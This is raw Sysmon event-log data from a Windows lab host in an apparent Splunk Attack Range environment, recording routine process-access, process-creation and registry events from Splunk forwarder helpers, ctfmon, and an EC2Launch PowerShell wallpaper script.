13:30:19.373{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.373{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.373{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-476B-6000-2E05-000000009A01}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.373{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-476B-6000-2E05-000000009A01}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.233{08A6967A-476B-6000-2E05-000000009A01}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000012389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:20.295{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-476C-6000-2F05-000000009A01}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:20.295{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:20.295{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:20.295{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:20.295{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:20.295{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-476C-6000-2F05-000000009A01}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:20.295{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-476C-6000-2F05-000000009A01}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:20.155{08A6967A-476C-6000-2F05-000000009A01}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000012428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.670{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-476E-6000-3305-000000009A01}6660C:\Windows\System32\ctfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.654{08A6967A-4754-6000-1705-000000009A01}34086160C:\Windows\Explorer.EXE{08A6967A-476E-6000-3305-000000009A01}6660C:\Windows\System32\ctfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13755f|C:\Windows\System32\windows.storage.dll+1371d5|C:\Windows\System32\windows.storage.dll+136cc6|C:\Windows\System32\windows.storage.dll+138138|C:\Windows\System32\windows.storage.dll+136aee|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\windows.storage.dll+1241fa|C:\Windows\System32\windows.storage.dll+123f5a|C:\Windows\System32\SHELL32.dll+77991|C:\Windows\System32\SHELL32.dll+767f6|C:\Windows\System32\SHELL32.dll+110821|C:\Windows\System32\SHELL32.dll+7888e|C:\Windows\Explorer.EXE+118eb|C:\Windows\Explorer.EXE+1163f|C:\Windows\Explorer.EXE+12610|C:\Windows\Explorer.EXE+134aa|C:\Windows\Explorer.EXE+129be|C:\Windows\Explorer.EXE+126a3 154100x800000000000000012422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.661{08A6967A-476E-6000-3305-000000009A01}6660C:\Windows\System32\ctfmon.exe10.0.14393.0 (rs1_release.160715-1616)CTF LoaderMicrosoft® Windows® Operating SystemMicrosoft CorporationCTFMON.EXE"C:\Windows\System32\ctfmon.exe" /nC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=BB38581A13B7265CF4E62741955E7457,SHA256=103C028F6ED13FDF916B0B15138BDFE66CAC0D667D735D853FC8E45341FE8A3A,IMPHASH=C799FE056F8DF24A5E47C4D509C9D61C{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 12241200x800000000000000012421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1060,RunKeyDeleteValue2021-01-14 13:30:22.654{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXEHKU\S-1-5-21-2738482597-1131698221-3520544381-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce\ctfmon.exe 10341000x800000000000000012420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.279{08A6967A-476E-6000-3105-000000009A01}65806600C:\Windows\system32\conhost.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.279{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.279{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.279{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.279{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.279{08A6967A-4750-6000-0205-000000009A01}47886156C:\Windows\system32\csrss.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.279{08A6967A-476E-6000-3005-000000009A01}65726576C:\Windows\system32\cmd.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.285{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" C:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x800000000000000012412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 